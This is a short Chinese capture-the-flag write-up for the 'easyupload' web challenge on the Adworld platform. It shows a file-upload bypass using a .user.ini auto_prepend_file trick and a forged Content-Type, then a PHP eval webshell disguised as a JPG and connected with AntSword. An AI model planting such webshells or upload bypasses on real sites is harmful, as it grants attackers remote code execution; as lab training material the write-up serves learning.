攻防世界-WEB-easyupload

1.新建.user.ini文件,内容如下

GIF89a

auto_prepend_file=a.jpg

2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为

Content-Type: image/jpg

3.放包,结果如下

  1. 新建a.txt文件,内容为

GIF89a

<?=eval($_REQUEST['cmd']);?>

保存后将文件后缀修改为.jpg

5.直接上传该文件即可成功上传

PS:按F12打开调试器选择网络查看上传文件的地址

如图所示上传地址为:****/uploads/index.php

6.直接蚁剑连接

7.结果如下

8.查找flag

相关推荐
LXS_3573 天前
Day 15 C++之文件操作
开发语言·c++·学习方法·改行学it
小年糕是糕手3 天前
【C++】类和对象(五) -- 类型转换、static成员
开发语言·c++·程序人生·考研·算法·visual studio·改行学it
yesyesido5 天前
PDF全能管家:3合1智能处理,一键解锁高效文档管理新体验
科技·考研·安全·pdf·生活·交互·改行学it
小年糕是糕手6 天前
【C++】类和对象(三) -- 拷贝构造函数、赋值运算符重载
开发语言·c++·程序人生·考研·github·个人开发·改行学it
一起养小猫14 天前
《半小时漫画计算机》读后感:从入门到构建知识体系
职场和发展·学习方法·改行学it
蒙奇D索大21 天前
【计算机网络】考研408 | 数据链路层的“安全卫士”:探秘检错编码之奇偶校验码
经验分享·笔记·计算机网络·考研·改行学it
蒙奇D索大22 天前
【算法】回溯算法精讲:从深度优先搜索到剪枝优化
经验分享·笔记·算法·深度优先·剪枝·改行学it
蒙奇D索大23 天前
【算法】 递归实战应用:从暴力迭代到快速幂的优化之路
笔记·考研·算法·改行学it
蒙奇D索大1 个月前
【11408学习记录】考研数学核心考点精讲:二维随机变量(离散与连续)全面解析
笔记·学习·考研·概率论·改行学it
蒙奇D索大1 个月前
【算法】递归算法实战:汉诺塔问题详解与代码实现
c语言·考研·算法·面试·改行学it